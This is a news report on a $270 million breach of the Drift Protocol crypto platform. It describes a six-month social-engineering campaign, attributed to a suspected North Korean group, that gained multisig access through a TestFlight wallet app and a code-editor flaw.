New revelations have surfaced regarding the high-profile cyberattack on Drift Protocol, which led to an estimated $270 million in losses. According to an update from the protocol’s development team, a group with suspected ties to the North Korean state orchestrated the scheme over an extensive six-month period, utilizing sophisticated infiltration tactics to bypass security measures.
Preparation and infiltration: establishing trust within the ecosystem
The first contact reportedly occurred at a major cryptocurrency conference in the fall of 2025, where the attackers disguised themselves as representatives of a quantitative trading firm. Possessing both technical expertise and seemingly verifiable professional backgrounds, the group methodically earned the trust of the Drift network by demonstrating a detailed understanding of protocol operations.
Vulnerabilities exploited and attack mechanisms
The group expanded their involvement beginning in October, initiating direct contact with the Drift community via Telegram. Presenting trading strategies common to the DeFi sector, they established legitimacy among key stakeholders. Between December 2025 and January 2026, the attackers deposited more than $1 million of their own funds onto the protocol, further cementing their presence. During this period, they maintained regular face-to-face interactions with core team members, building a rapport that would enable deeper access to the organization.
In February and March, the relationship between the attackers and Drift contributors strengthened as they met in person at various industry events around the world. These interactions further solidified an atmosphere of trust, which proved instrumental in facilitating the subsequent breach.
On the technical side, the investigation uncovered two principal attack vectors. One of the group members introduced a wallet application to the ecosystem via Apple’s TestFlight platform, successfully circumventing established security checks. This allowed the app to evade scrutiny by appearing as a legitimate tool.
Another significant vulnerability lay in the use of popular code editors—VSCode and Cursor—which became a vector for exploitation. As highlighted by the security community since late 2025, these editors contained a flaw that enabled attackers to take control of devices simply by getting victims to open a malicious file or folder, triggering harmful code execution without further interaction.
Utilizing these methods, the group managed to bypass security measures and gain multisignature (multisig) privileges, granting them access needed to execute the attack. The malicious transactions, prepared in advance, remained on hold for over a week before being executed on April 1, resulting in the swift withdrawal of funds from the protocol within a matter of minutes.
Evidence increasingly points to the involvement of UNC4736, a group believed to operate on behalf of North Korea. Also tracked under the names AppleJeus and Citrine Sleet, this group has recently been linked to several similar cyberattacks targeting the cryptocurrency sector.
Further investigation found that the individuals appearing at conferences were likely not North Korean nationals. It is believed that advanced forged identities and professional networks are employed as proxies to infiltrate such organizations, making direct attribution more complex in these types of operations.
Drift’s team has called on other protocols in the sector to rigorously audit multisig access points and device security. The breach has renewed broader discussions on the limitations of multisig management as a security model in decentralized finance, highlighting the evolving sophistication of threat actors in the space.
